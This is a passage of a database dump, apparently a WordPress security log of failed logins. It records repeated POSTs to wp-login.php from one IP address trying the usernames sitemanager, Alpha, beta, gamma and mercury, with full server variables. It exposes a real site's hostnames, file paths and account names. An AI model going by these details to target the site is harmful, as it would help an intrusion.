v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746982293.3881841;s:12:\"REQUEST_TIME\";i:1746982293;}}','13.233.245.36',1,'2025-05-11 22:21:35','2025-05-12 23:29:05'),(95531,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746982644.129662;s:12:\"REQUEST_TIME\";i:1746982644;}}','13.233.245.36',1,'2025-05-11 22:27:25','2025-05-12 23:29:05'),(95532,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746982644.1328061;s:12:\"REQUEST_TIME\";i:1746982644;}}','13.233.245.36',1,'2025-05-11 22:27:26','2025-05-12 23:29:05'),(95533,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746982644.1338339;s:12:\"REQUEST_TIME\";i:1746982644;}}','13.233.245.36',1,'2025-05-11 22:27:26','2025-05-12 23:29:05'),(95534,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746982644.1352079;s:12:\"REQUEST_TIME\";i:1746982644;}}','13.233.245.36',1,'2025-05-11 22:27:26','2025-05-12 23:29:05'),(95535,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746982645.991869;s:12:\"REQUEST_TIME\";i:1746982645;}}','13.233.245.36',1,'2025-05-11 22:27:27','2025-05-12 23:29:05'),(95536,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746983004.7525251;s:12:\"REQUEST_TIME\";i:1746983004;}}','13.233.245.36',1,'2025-05-11 22:33:26','2025-05-12 23:29:05'),(95537,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746983004.7536831;s:12:\"REQUEST_TIME\";i:1746983004;}}','13.233.245.36',1,'2025-05-11 22:33:26','2025-05-12 23:29:05'),(95538,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746983004.7562799;s:12:\"REQUEST_TIME\";i:1746983004;}}','13.233.245.36',1,'2025-05-11 22:33:26','2025-05-12 23:29:05'),(95539,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746983004.7612419;s:12:\"REQUEST_TIME\";i:1746983004;}}','13.233.245.36',1,'2025-05-11 22:33:26','2025-05-12 23:29:05'),(95540,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746983004.7877741;s:12:\"REQUEST_TIME\";i:1746983004;}}','13.233.245.36',1,'2025-05-11 22:33:26','2025-05-12 23:29:05'),(95541,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"125\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"125\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"